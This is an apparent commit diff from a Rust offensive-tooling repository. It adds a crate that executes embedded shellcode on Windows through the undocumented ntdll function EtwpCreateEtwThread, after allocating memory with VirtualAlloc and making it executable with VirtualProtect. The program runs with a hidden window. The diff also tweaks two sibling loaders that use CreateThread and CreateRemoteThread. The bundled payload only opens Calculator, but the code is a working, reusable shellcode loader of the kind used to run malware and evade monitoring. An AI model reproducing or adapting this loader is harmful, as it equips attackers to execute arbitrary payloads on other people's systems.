b1nhack
diff --git a/‎create_remote_thread/src/main.rs‎
Lines changed: 1 addition & 0 deletions b/‎create_remote_thread/src/main.rs‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎create_thread/src/main.rs‎
Lines changed: 1 addition & 0 deletions b/‎create_thread/src/main.rs‎
Lines changed: 1 addition & 0 deletions
diff --git a/‎etwp_create_etw_thread/Cargo.toml‎
Lines changed: 9 additions & 0 deletions b/‎etwp_create_etw_thread/Cargo.toml‎
Lines changed: 9 additions & 0 deletions
diff --git a/‎etwp_create_etw_thread/src/main.rs‎
Lines changed: 49 additions & 0 deletions b/‎etwp_create_etw_thread/src/main.rs‎
Lines changed: 49 additions & 0 deletions
@@ -14,6 +14,7 @@ use windows_sys::Win32::System::Threading::{CreateRemoteThread, OpenProcess, PRO
 static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin");
 static SIZE: usize = SHELLCODE.len();
 
+#[cfg(target_os = "windows")]
 fn main() {
  let mut old = PAGE_READWRITE;
 
 
@@ -11,6 +11,7 @@ use windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};
 static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin");
 static SIZE: usize = SHELLCODE.len();
 
+#[cfg(target_os = "windows")]
 fn main() {
  let mut old = PAGE_READWRITE;
 
 
@@ -0,0 +1,9 @@
+[package]
+name = "etwp_create_etw_thread"
+version = "0.1.0"
+edition = "2021"
+
+# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
+
+[dependencies]
+windows-sys = { version = "0.45.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_LibraryLoader", "Win32_System_Threading"] }
@@ -0,0 +1,49 @@
+#![windows_subsystem = "windows"]
+
+use std::ffi::c_void;
+use std::mem::transmute;
+use std::ptr::{copy, null, null_mut};
+use windows_sys::Win32::Foundation::{FALSE, HANDLE, WAIT_FAILED};
+use windows_sys::Win32::System::LibraryLoader::{GetProcAddress, LoadLibraryA};
+use windows_sys::Win32::System::Memory::{
+ VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,
+};
+use windows_sys::Win32::System::Threading::WaitForSingleObject;
+
+static SHELLCODE: [u8; 98] = *include_bytes!("../../w64-exec-calc-shellcode-func.bin");
+static SIZE: usize = SHELLCODE.len();
+
+#[cfg(target_os = "windows")]
+fn main() {
+ let mut old = PAGE_READWRITE;
+
+ unsafe {
+ let ntdll = LoadLibraryA("ntdll.dll\0".as_ptr());
+ if ntdll == 0 {
+ eprintln!("LoadLibraryA failed!");
+ return;
+ }
+
+ let etw = GetProcAddress(ntdll, "EtwpCreateEtwThread\0".as_ptr());
+
+ let dest = VirtualAlloc(null(), SIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+ if dest == null_mut() {
+ eprintln!("VirtualAlloc failed!");
+ return;
+ }
+
+ copy(SHELLCODE.as_ptr(), dest as *mut u8, SIZE);
+
+ let res = VirtualProtect(dest, SIZE, PAGE_EXECUTE, &mut old);
+ if res == FALSE {
+ eprintln!("VirtualProtect failed!");
+ return;
+ }
+
+ let etw: extern "C" fn(addr: *mut c_void, i: isize) -> HANDLE = transmute(etw);
+
+ let thread = etw(dest, 0);
+
+ WaitForSingleObject(thread, WAIT_FAILED);
+ }
+}